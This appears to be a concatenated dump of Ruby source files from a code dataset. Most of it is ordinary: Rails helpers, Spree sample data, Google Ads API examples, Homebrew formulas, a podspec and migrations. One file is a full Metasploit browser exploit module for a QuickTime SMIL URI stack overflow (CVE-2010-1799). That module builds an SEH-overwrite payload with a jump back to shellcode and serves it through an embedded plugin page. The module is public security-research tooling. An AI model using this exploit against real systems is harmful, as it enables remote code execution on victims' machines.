    include ActiveModel::Serializers::JSON
    included do
      self.include_root_in_json = false
    end
    # Builds the attribute hash for serialization. When the model has an
    # inheritance (STI) column, it is excluded by default: the column name is
    # appended to options[:except] (normalized to strings first) before
    # delegating to ActiveModel's implementation. The passed options hash is
    # duplicated, so the caller's hash is never mutated.
    def serializable_hash(options = nil)
      if self.class._has_attribute?(self.class.inheritance_column)
        options = options ? options.dup : {}
        options[:except] = Array(options[:except]).map(&:to_s)
        options[:except] |= Array(self.class.inheritance_column)
      end
      super(options)
    end
  end
end
| 23.76 | 66 | 0.683502 |
b90e3dfd75e8781f7c1416603318db05c4f2a60e | 624 | Spree::Sample.load_sample("orders")
# Sample data: build a reimbursement for the most recent order — accept a
# return item (with an exchange), group it into a customer return, then
# create the reimbursement referencing both.
order = Spree::Order.last
inventory_unit = order.inventory_units.first
stock_location = inventory_unit.find_stock_item.stock_location
# Create the return item and pick an exchange variant for it.
return_item = Spree::ReturnItem.create(inventory_unit: inventory_unit)
return_item.exchange_variant = return_item.eligible_exchange_variants.last
return_item.build_exchange_inventory_unit
return_item.accept!
customer_return = Spree::CustomerReturn.create(
  stock_location: stock_location,
  return_items: [return_item]
)
order.reimbursements.create(
  customer_return: customer_return,
  return_items: [return_item]
)
| 28.363636 | 75 | 0.796474 |
6ac63df452d863836bb64bdd210d68c8e13f62ad | 4,650 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
# Browser/plugin exploit for CVE-2010-1799: stack-based SEH overwrite in
# Apple QuickTime 7.6.6 triggered while logging an invalid SMIL URI.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking # needs more testing/targets to be Great
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Seh
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({
    :os_name => OperatingSystems::WINDOWS,
    :javascript => true,
    :rank => NormalRanking, # reliable memory corruption
    :vuln_test => nil,
  })
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Apple QuickTime
        7.6.6. When processing a malformed SMIL uri, a stack-based buffer
        overflow can occur when logging an error message.
      },
      'Author'         =>
        [
          'Krystian Kloskowski', # original discovery
          'jduck' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-1799' ],
          [ 'OSVDB', '66636'],
          [ 'BID', '41962' ],
          [ 'URL', 'http://secunia.com/advisories/40729/' ],
          [ 'URL', 'http://support.apple.com/kb/HT4290' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Payload'        =>
        {
          'Space' => 640, # 716 - 63 - 8 - 5
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          #[ 'Automatic', { } ],
          [ 'Apple QuickTime Player 7.6.6',
            {
              'Ret' => 0x66801042 # p/p/r from QuickTime.qts (v7.66.71.0)
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Aug 12 2010',
      'DefaultTarget'  => 0))
  end
  # Serves either the malicious SMIL (to QuickTime / *.smil requests) or a
  # launcher HTML page that embeds the QuickTime plugin pointing back at it.
  def on_request_uri(client, request)
    return if ((p = regenerate_payload(client)) == nil)
    if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/)
      print_status("Sending exploit SMIL (target: #{target.name})")
      # This is all basically filler on the browser target because we can't
      # expect the SEH to be in a reliable place across multiple browsers.
      # Heap spray ftw.
      off = 716
      start = "cHTTPDhlr_SetURL - url doesn't start with http:// or http1:// '"
      scheme = rand_text_alphanumeric(5)
      sploit = ''
      sploit << scheme
      sploit << "://"
      # payload
      sploit << p.encoded
      # pad to SEH
      sploit << rand_text_english(off - sploit.length - start.length)
      # seh frame
      sploit << generate_seh_record(target.ret)
      # jmp back to payload
      distance = off + 8 - (8 + start.length)
      sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
      # force exception while writing
      sploit << rand_text(1024) * 15
      smil = %Q|<smil xmlns="http://www.w3.org/2001/SMIL20/Language">
<body>
<img src="#{sploit}" />
</body>
</smil>
|
      send_response(client, smil, { 'Content-Type' => "application/smil" })
    else
      print_status("Sending initial HTML")
      shellcode = Rex::Text.to_unescape(p.encoded)
      url = ((datastore['SSL']) ? "https://" : "http://")
      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
      url << ":" + datastore['SRVPORT'].to_s
      url << get_resource
      fname = rand_text_alphanumeric(4)
      content = "<html><body>"
      content << <<-ENDEMBED
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
WIDTH="1"
HEIGHT="1"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
<PARAM name="SRC" VALUE = "#{url}/#{fname}.smil">
<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.smil">
<PARAM name="AUTOPLAY" VALUE = "true" >
<PARAM name="TYPE" VALUE = "video/quicktime" >
<PARAM name="TARGET" VALUE = "myself" >
<EMBED
SRC = "#{url}/#{fname}.qtl"
QTSRC = "#{url}/#{fname}.qtl"
TARGET = "myself"
WIDTH = "1"
HEIGHT = "1"
AUTOPLAY = "true"
PLUGIN = "quicktimeplugin"
TYPE = "video/quicktime"
CACHE = "false"
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
</EMBED>
</OBJECT>
ENDEMBED
      content << "</body></html>"
      send_response(client, content, { 'Content-Type' => "text/html" })
    end
    # Handle the payload
    handler(client)
  end
end
| 28.703704 | 116 | 0.592688 |
f8d7819fb15d8b0378bd975eba72cab2d61f27a5 | 1,278 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# [START logging_v2_generated_ConfigService_UpdateCmekSettings_sync]
require "google/cloud/logging/v2"
# Create a client object. The client can be reused for multiple calls.
client = Google::Cloud::Logging::V2::ConfigService::Client.new
# Create a request. To set request fields, pass in keyword arguments.
request = Google::Cloud::Logging::V2::UpdateCmekSettingsRequest.new
# Call the update_cmek_settings method.
result = client.update_cmek_settings request
# The returned object is of type Google::Cloud::Logging::V2::CmekSettings.
p result
# [END logging_v2_generated_ConfigService_UpdateCmekSettings_sync]
| 37.588235 | 74 | 0.786385 |
5ddb48d9157be9134a47a7b02b7c40e785844b91 | 601 | Pod::Spec.new do |s|
s.name = "FHTTPClient"
s.version = "0.0.3"
s.license = { :type => 'Apache License, Version 2.0', :file => 'LICENSE' }
s.summary = "A simple iOS HTTP Client for REST services."
s.homepage = "https://github.com/furymobile/FHTTPClient"
s.author = { "Fury Mobile" => "[email protected]" }
s.source = { :git => "https://github.com/furymobile/FHTTPClient.git", :tag => "0.0.3" }
s.source_files = 'FHTTPClient/FHTTPClient/**/*.{h,m}'
s.ios.deployment_target = '5.0'
s.frameworks = 'Foundation'
s.requires_arc = true
end
| 42.928571 | 95 | 0.605657 |
f7fd8ecbc4a775651620310bd8bb7806f66d3e4d | 506 | cask "amd-power-gadget" do
version "0.6.6"
sha256 "2a09858baf24ea757fada5243c20c94bfc92054b6ba8dd04e0e77c423915fe96"
url "https://github.com/trulyspinach/SMCAMDProcessor/releases/download/#{version}/AMD.Power.Gadget.app.zip"
appcast "https://github.com/trulyspinach/SMCAMDProcessor/releases.atom"
name "AMD Power Gadget"
desc "Power management, monitoring and VirtualSMC plugin for AMD processors"
homepage "https://github.com/trulyspinach/SMCAMDProcessor"
app "AMD Power Gadget.app"
end
| 38.923077 | 109 | 0.79249 |
ed6708e2cee7b91d5ac5fc7abd72c7842308a7f2 | 817 |
module RabbitMQ
module FFI
class ConnectionTune < ::FFI::Struct
layout(
:channel_max, :uint16,
:frame_max, :uint32,
:heartbeat, :uint16
)
def self.id
:connection_tune
end
def id
:connection_tune
end
def apply(channel_max: nil, frame_max: nil, heartbeat: nil)
self[:channel_max] = Integer(channel_max) if channel_max
self[:frame_max] = Integer(frame_max) if frame_max
self[:heartbeat] = Integer(heartbeat) if heartbeat
self
end
def to_h(free=false)
{
channel_max: self[:channel_max],
frame_max: self[:frame_max],
heartbeat: self[:heartbeat]
}
end
def free!
end
end
end
end
| 20.425 | 65 | 0.53978 |
397933cb9ee2373caa9a6c21fedb1f675dff041e | 159 | class CreateAromas < ActiveRecord::Migration[5.2]
def change
create_table :aromas do |t|
t.string :aroma_name
t.timestamps
end
end
end
| 17.666667 | 49 | 0.672956 |
f8bde530c9f6a520a1522df7183d98b63ec3efdf | 2,771 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example gets all campaigns. To add campaigns, run add_campaigns.rb.
require 'optparse'
require 'google/ads/google_ads'
# Streams all campaigns for the given customer ID (digits only, no dashes)
# and prints one line per campaign found.
def get_campaigns(customer_id)
  # GoogleAdsClient will read a config file from
  # ENV['HOME']/google_ads_config.rb when called without parameters
  client = Google::Ads::GoogleAds::GoogleAdsClient.new
  responses = client.service.google_ads.search_stream(
    customer_id: customer_id,
    query: 'SELECT campaign.id, campaign.name FROM campaign ORDER BY campaign.id',
  )
  responses.each do |response|
    response.results.each do |row|
      puts "Campaign with ID #{row.campaign.id} and name '#{row.campaign.name}' was found."
    end
  end
end
if __FILE__ == $0
  # NOTE(review): PAGE_SIZE is not referenced anywhere in this example —
  # confirm before removing.
  PAGE_SIZE = 1000
  options = {}
  # The following parameter(s) should be provided to run the example. You can
  # either specify these by changing the INSERT_XXX_ID_HERE values below, or on
  # the command line.
  #
  # Parameters passed on the command line will override any parameters set in
  # code.
  #
  # Running the example with -h will print the command line usage.
  options[:customer_id] = 'INSERT_CUSTOMER_ID_HERE'
  OptionParser.new do |opts|
    opts.banner = sprintf('Usage: %s [options]', File.basename(__FILE__))
    opts.separator ''
    opts.separator 'Options:'
    opts.on('-C', '--customer-id CUSTOMER-ID', String, 'Customer ID') do |v|
      options[:customer_id] = v
    end
    opts.separator ''
    opts.separator 'Help:'
    opts.on_tail('-h', '--help', 'Show this message') do
      puts opts
      exit
    end
  end.parse!
  begin
    # Strip dashes so "123-456-7890" style IDs are accepted.
    get_campaigns(options.fetch(:customer_id).tr("-", ""))
  rescue Google::Ads::GoogleAds::Errors::GoogleAdsError => e
    # Print every partial failure with its field path and error code, then
    # re-raise so the process exits non-zero.
    e.failure.errors.each do |error|
      STDERR.printf("Error with message: %s\n", error.message)
      if error.location
        error.location.field_path_elements.each do |field_path_element|
          STDERR.printf("\tOn field: %s\n", field_path_element.field_name)
        end
      end
      error.error_code.to_h.each do |k, v|
        next if v == :UNSPECIFIED
        STDERR.printf("\tType: %s\n\tCode: %s\n", k, v)
      end
    end
    raise
  end
end
| 30.450549 | 91 | 0.694695 |
edbd48b9cf2fe4933fa700a4fe9111dd8deffe86 | 833 | require 'synapse/process_manager/correlation'
require 'synapse/process_manager/correlation_resolver'
require 'synapse/process_manager/correlation_set'
require 'synapse/process_manager/lock_manager'
require 'synapse/process_manager/pessimistic_lock_manager'
require 'synapse/process_manager/process'
require 'synapse/process_manager/process_factory'
require 'synapse/process_manager/process_manager'
require 'synapse/process_manager/process_repository'
require 'synapse/process_manager/resource_injector'
# Must be loaded after the resource injector
require 'synapse/process_manager/container_resource_injector'
require 'synapse/process_manager/simple_process_manager'
require 'synapse/process_manager/mapping/process'
require 'synapse/process_manager/mapping/process_manager'
require 'synapse/process_manager/repository/in_memory'
| 43.842105 | 61 | 0.87515 |
2137d96f746235e77802d290cedbed78503629d5 | 183 | # frozen_string_literal: true
ENV["BUNDLE_GEMFILE"] ||= File.expand_path("../Gemfile", __dir__)
require "bundler/setup" # Set up gems listed in the Gemfile.
require "bootsnap/setup"
| 30.5 | 65 | 0.748634 |
e9452f28c252a81731b6866e455d3b22e27c5435 | 1,894 | # frozen_string_literal: true
require File.expand_path("../lib/mail_catcher/version", __FILE__)
# Gem specification for MailCatcher (SMTP catcher with a web UI).
Gem::Specification.new do |s|
  s.name = "mailcatcher"
  s.version = MailCatcher::VERSION
  s.license = "MIT"
  s.summary = "Runs an SMTP server, catches and displays email in a web interface."
  s.description = <<-END
    MailCatcher runs a super simple SMTP server which catches any
    message sent to it to display in a web interface. Run
    mailcatcher, set your favourite app to deliver to
    smtp://127.0.0.1:1025 instead of your default SMTP server,
    then check out http://127.0.0.1:1080 to see the mail.
  END
  s.author = "Samuel Cochran"
  s.email = "[email protected]"
  s.homepage = "http://mailcatcher.me"
  # Ship docs, executables, library code and web assets; the assets.rb
  # source file is excluded from the packaged gem.
  s.files = Dir[
    "README.md", "LICENSE", "VERSION",
    "bin/*",
    "lib/**/*.rb",
    "public/**/*",
    "views/**/*",
  ] - Dir["lib/mail_catcher/web/assets.rb"]
  s.require_paths = ["lib"]
  s.executables = ["mailcatcher", "catchmail"]
  s.extra_rdoc_files = ["README.md", "LICENSE"]
  s.required_ruby_version = ">= 2.0.0"
  s.add_dependency "eventmachine", "1.0.9.1"
  s.add_dependency "midi-smtp-server", "~> 2.3.1"
  s.add_dependency "mail", "~> 2.3"
  s.add_dependency "rack", "~> 1.5"
  s.add_dependency "sinatra", "~> 1.2"
  s.add_dependency "sqlite3", "~> 1.3"
  s.add_dependency "thin", "~> 1.5.0"
  s.add_dependency "skinny", "~> 0.2.3"
  s.add_development_dependency "coffee-script"
  s.add_development_dependency "compass", "~> 1.0.3"
  s.add_development_dependency "minitest", "~> 5.0"
  s.add_development_dependency "rake"
  s.add_development_dependency "rdoc"
  s.add_development_dependency "sass"
  s.add_development_dependency "selenium-webdriver", "~> 3.7"
  s.add_development_dependency "sprockets"
  s.add_development_dependency "sprockets-sass"
  s.add_development_dependency "sprockets-helpers"
  s.add_development_dependency "uglifier"
end
| 33.821429 | 83 | 0.689018 |
089ff25649049921d190d4010a39142c673a9d9c | 120 | module OpenFlashChart
class BarBase < Base
def attach_to_right_y_axis
@axis = 'right'
end
end
end
| 15 | 30 | 0.658333 |
620559093bf173899df68387fe5b798566fa76ee | 1,263 | module Fog
module AWS
class DynamoDB
class Real
# Get DynamoDB items
#
# ==== Parameters
# * 'request_items'<~Hash>:
# * 'table_name'<~Hash>:
# * 'Keys'<~Array>: array of keys
#
# ==== Returns
# * response<~Excon::Response>:
# * body<~Hash>:
# * 'Responses'<~Hash>:
# * 'table_name'<~Array> - array of all elements
# * 'UnprocessedKeys':<~Hash> - tables and keys in excess of per request limit, pass this to subsequent batch get for pseudo-pagination
# * 'ConsumedCapacity':<~Hash>:
# * 'TableName'<~String> - the name of the table
# * 'CapacityUnits'<~Float> - Capacity units used in read
#
# See DynamoDB Documentation: http://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_BatchGetItem.html
#
def batch_get_item(request_items)
body = {
'RequestItems' => request_items
}
request(
:body => Fog::JSON.encode(body),
:headers => {'x-amz-target' => 'DynamoDB_20120810.BatchGetItem'},
:idempotent => true
)
end
end
end
end
end
| 32.384615 | 147 | 0.517815 |
d574b9fa9d82cda28acc05394e5c361486ace85e | 1,145 | require "language/node"
# Homebrew formula for the Bash language server (npm package).
class BashLanguageServer < Formula
  desc "Language Server for Bash"
  homepage "https://github.com/bash-lsp/bash-language-server"
  url "https://registry.npmjs.org/bash-language-server/-/bash-language-server-3.0.4.tgz"
  sha256 "88a676b6ad4dc6409a813588fd975a97f881b8f4c2bb4fcb3d4880302606dc2d"
  license "MIT"
  bottle do
    root_url "https://github.com/gromgit/homebrew-core-mojave/releases/download/bash-language-server"
    sha256 cellar: :any_skip_relocation, mojave: "58e20942d6fcd90bf7d78deba2b7c4d6f3473a2f8074318082eb76253cf369c5"
  end
  depends_on "node"
  def install
    # npm-install into libexec, then expose the CLI entry points in bin
    system "npm", "install", *Language::Node.std_npm_install_args(libexec)
    bin.install_symlink Dir["#{libexec}/bin/*"]
  end
  # Smoke test: send an LSP "initialize" request over stdio and expect a
  # framed (Content-Length:) response back.
  test do
    json = <<~JSON
      {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "initialize",
        "params": {
          "rootUri": null,
          "capabilities": {}
        }
      }
    JSON
    input = "Content-Length: #{json.size}\r\n\r\n#{json}"
    output = pipe_output("#{bin}/bash-language-server start", input, 0)
    assert_match(/^Content-Length: \d+/i, output)
  end
end
| 29.358974 | 115 | 0.672489 |
2143fe2e434170758a895262493daa7e8621733f | 171 | require 'active_support/lazy_load_hooks'
require 'web_console/engine'
require 'web_console/repl'
# Top-level namespace for the web-console gem. Loading this file fires the
# :web_console lazy-load hooks so host applications can defer their
# configuration (via ActiveSupport.on_load(:web_console)) until the gem is
# actually loaded.
module WebConsole
  # Run any registered :web_console load hooks, passing this module as the
  # hook context.
  ActiveSupport.run_load_hooks(:web_console, self)
end
| 21.375 | 50 | 0.836257 |
abbf44e6da25269221950d92fbf7f2b883bc5117 | 2,908 | module Rebels
class CreateService < ServiceBase
PreconditionFailedError = Class.new(StandardError)
attr_reader :rebel, :local_group, :source
def initialize(source: nil, local_group: nil)
@rebel = Rebel.new
@local_group = local_group
@source = source
end
def run(params = {})
context = {
params: params,
local_group: local_group,
source: source
}
catch_error(context: context) do
run!(params)
end
end
def run!(params = {})
@rebel.source = @source
@rebel.language ||= ENV['XR_BRANCH_DEFAULT_LANGUAGE']
case @source
when "admin"
@rebel.consent = true
@rebel.local_group ||= @local_group
@rebel.attributes = rebel_admin_params(params)
when "public"
@rebel.attributes = rebel_public_params(params)
end
validate_email_format! if @rebel.valid?
generate_token
delete_existing_rebel_if_no_local_group(@rebel.email)
@rebel.save!
Mailtrain::AddSubscriptionsJob.perform_later(@rebel)
true
end
def redirect_url
case @source
when "admin"
@rebel
when "public"
rebel.redirect || rebel.profile_url
end
end
private
# We prefer a new and clean signup than keeping an old record that is not
# linked to a local group
def delete_existing_rebel_if_no_local_group(email)
existing_rebel = Rebel.where(email: email, local_group_id: nil)&.take
if existing_rebel
Rebels::DeleteService.new(rebel: existing_rebel).run!
end
end
def generate_token
@rebel.token = SecureRandom.hex(16).to_i(16).to_s(36)
end
def rebel_admin_params(params)
params
.require(:rebel)
.permit(
:availability,
:email,
:interests,
:internal_notes,
:irl,
:language,
:local_group_id,
:name,
:notes,
:number_of_arrests,
:phone,
:postcode,
:regular_volunteer,
:status,
:tag_list,
:willingness_to_be_arrested,
skill_ids: [],
working_group_ids: []
)
end
def rebel_public_params(params)
params.require(:rebel).permit(
:availability,
:consent,
:email,
:language,
:local_group_id,
:name,
:notes,
:phone,
:postcode,
:redirect,
:tag_list,
:willingness_to_be_arrested,
:agree_with_principles,
skill_ids: [],
)
end
def validate_email_format!
if ValidatesEmailFormatOf::validate_email_format(rebel.email) == nil
true # email is valid
else
raise PreconditionFailedError,
_("Please double check the email address provided.")
end
end
end
end
| 23.836066 | 77 | 0.587001 |
91353d924a61c8efb7c0e8d520c91c28db5cb8ac | 273 | class CreateContactHistories < ActiveRecord::Migration
def self.up
create_table :contact_histories do |t|
t.integer :person_id
t.text :type
t.text :email
t.timestamps
end
end
def self.down
drop_table :contact_histories
end
end
| 17.0625 | 54 | 0.681319 |
79b76709ee76b7a2f21db0ba9c5ee91c9e7b7f8e | 616 | # frozen_string_literal: true
require 'kaminari/mongoid/mongoid_criteria_methods'
module Kaminari
  module Mongoid
    module MongoidExtension
      # Mixed into Mongoid::Document models to add the paginating scope,
      # named after Kaminari.config.page_method_name (`page` by default).
      module Document
        extend ActiveSupport::Concern
        include Kaminari::ConfigurationMethods

        included do
          scope Kaminari.config.page_method_name, Proc.new {|num|
            # Page numbers are 1-based; nil or anything below 1 is clamped
            # to the first page before computing the offset.
            page_index = [num.to_i - 1, 0].max
            limit(default_per_page).offset(default_per_page * page_index)
          } do
            include Kaminari::Mongoid::MongoidCriteriaMethods
            include Kaminari::PageScopeMethods
          end
        end
      end
    end
  end
end
| 26.782609 | 99 | 0.655844 |
ff38f736936140511c782fa7b323772a4ae8c174 | 1,295 | class WidgetsController < ApplicationController
include PasswordRequired::ControllerConcern
password_required for: [:create, :update, :destroy],
with: ->(password) { password == 'password' }
before_action :set_widget, only: [:show, :edit, :update, :destroy]
# GET /widgets
def index
@widgets = Widget.all
end
# GET /widgets/1
def show
end
# GET /widgets/new
def new
@widget = Widget.new
end
# GET /widgets/1/edit
def edit
end
# POST /widgets
def create
@widget = Widget.new(widget_params)
if @widget.save
redirect_to @widget, notice: 'Widget was successfully created.'
else
render :new
end
end
# PATCH/PUT /widgets/1
def update
if @widget.update(widget_params)
redirect_to @widget, notice: 'Widget was successfully updated.'
else
render :edit
end
end
# DELETE /widgets/1
def destroy
@widget.destroy
redirect_to widgets_url, notice: 'Widget was successfully destroyed.'
end
private
# Use callbacks to share common setup or constraints between actions.
def set_widget
@widget = Widget.find(params[:id])
end
# Only allow a trusted parameter "white list" through.
def widget_params
params.require(:widget).permit(:name)
end
end
| 19.923077 | 73 | 0.668726 |
e2147c582fd93125edfd8a3b5ea481d0cdd24834 | 258 | class CreateObjectFieldOptions < ActiveRecord::Migration
def change
create_table :object_field_options do |t|
t.integer :object_field_id
t.string :name
t.string :description
t.string :value
t.timestamps
end
end
end
| 19.846154 | 56 | 0.689922 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.